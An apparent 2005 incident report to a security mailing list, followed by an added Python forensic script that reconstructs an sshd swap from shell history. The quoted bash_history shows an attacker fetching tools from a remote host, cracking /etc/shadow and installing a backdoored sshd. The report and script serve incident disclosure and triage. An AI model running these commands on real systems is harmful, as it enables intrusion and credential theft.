From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor

Hi!

One of my web servers was hacked on July 17, 2005. bash_history
showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15          (37+11:47)
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)

whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,

Steve


----------------
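The history above shows the pattern worth automating when triaging a box like this: a system binary (/usr/sbin/sshd) is copied aside to an odd location (/lib/java/a), deleted, and overwritten with a freshly built one, after which the service is restarted. The script below is an added example, not code from the post or from any tool named in it. It replays cd/mkdir/cp/mv from an abridged copy of the quoted bash_history to work out which path was overwritten and where the original was stashed, then hashes both files against a known-good SHA-256 the way a package-manager check (rpm -V, debsums) would. The attacker's starting directory is unknown, so relative paths are resolved under the placeholder START_DIR; the fake root, file contents and known-good hash in demo() are constructed for the demonstration.

```python
"""Reconstruct a binary swap from bash_history and verify the files on disk.

Added example (not from the original post). SAMPLE_HISTORY is an abridged
copy of the lines quoted in the post; START_DIR is a placeholder because the
session's initial working directory is unknown.
"""
import hashlib
import os
import posixpath
import shlex
import tempfile

START_DIR = "/unknown-cwd"   # placeholder for the attacker's real starting cwd

# Constructed sample input: abridged from the bash_history in the post.
SAMPLE_HISTORY = """\
cd sshd;cd apps/ssh
pico genx.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/init.d/sshd restart
"""


def split_commands(history):
    """Yield argv lists from a bash_history blob; ';' joins several commands."""
    for line in history.splitlines():
        for cmd in line.split(";"):
            try:
                argv = shlex.split(cmd)
            except ValueError:
                continue        # unbalanced quotes: skip rather than guess
            if argv:
                yield argv


def reconstruct_replacements(history):
    """Follow cd/mkdir/cp/mv to find system files that were copied away and
    then overwritten.  Heuristic: a cp/mv destination is a directory if the
    history created it with mkdir or it is the parent of a path seen earlier.
    Returns {overwritten_path: {"stash": original_copy, "replaced_with": src}}.
    """
    cwd = START_DIR
    dirs = set()      # paths believed to be directories
    copies = {}       # current location of a copy -> path it came from
    replaced = {}

    def resolve(p):
        path = posixpath.normpath(posixpath.join(cwd, p))
        dirs.add(posixpath.dirname(path))
        return path

    for argv in split_commands(history):
        cmd, args = argv[0], [a for a in argv[1:] if not a.startswith("-")]
        if cmd == "cd" and args:
            cwd = resolve(args[0])
        elif cmd == "mkdir":
            for d in args:
                dirs.add(resolve(d))
        elif cmd in ("cp", "mv") and len(args) >= 2:
            src = resolve(args[0])
            dst = resolve(args[-1])
            if dst in dirs:                       # "cp file dir" form
                dst = posixpath.join(dst, posixpath.basename(src))
            if dst in copies.values():            # overwriting a path copied away earlier
                stash = next(loc for loc, o in copies.items() if o == dst)
                replaced[dst] = {"stash": stash, "replaced_with": src}
            else:
                # a moved copy keeps pointing at its original source path
                copies[dst] = copies.pop(src, src) if cmd == "mv" else copies.get(src, src)
    return replaced


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def verify_swap(root, overwritten, stash, known_good_sha256):
    """Hash the live binary and the stashed copy against a known-good value.
    root stands in for '/' (real triage: root='/', hash from the package
    database).  Status per file: 'matches', 'DIFFERS' or 'missing'."""
    out = {}
    for label, path in (("installed", overwritten), ("stash", stash)):
        full = os.path.join(root, path.lstrip("/"))
        if not os.path.isfile(full):
            out[label] = "missing"
        else:
            out[label] = "matches" if sha256_file(full) == known_good_sha256 else "DIFFERS"
    return out


def demo():
    """Constructed scenario: trojaned sshd in place, genuine one stashed."""
    genuine, trojan = b"ELF genuine sshd (constructed)", b"ELF trojaned sshd (constructed)"
    (overwritten, info), = reconstruct_replacements(SAMPLE_HISTORY).items()
    with tempfile.TemporaryDirectory() as root:
        for rel, data in ((overwritten, trojan), (info["stash"], genuine)):
            full = os.path.join(root, rel.lstrip("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
        return verify_swap(root, overwritten, info["stash"],
                           hashlib.sha256(genuine).hexdigest())


if __name__ == "__main__":
    print(reconstruct_replacements(SAMPLE_HISTORY))
    print(demo())   # {'installed': 'DIFFERS', 'stash': 'matches'}
```

On a real system the interesting outcome is exactly the one demo() produces: the installed sshd no longer matches the package, while the stray copy under /lib matches it, which confirms the swap and gives you a clean binary to diff against the trojaned one. Treat the reconstruction as a lead, not proof: the history has no timestamps, can be edited, and the directory heuristic can misfire on unusual layouts.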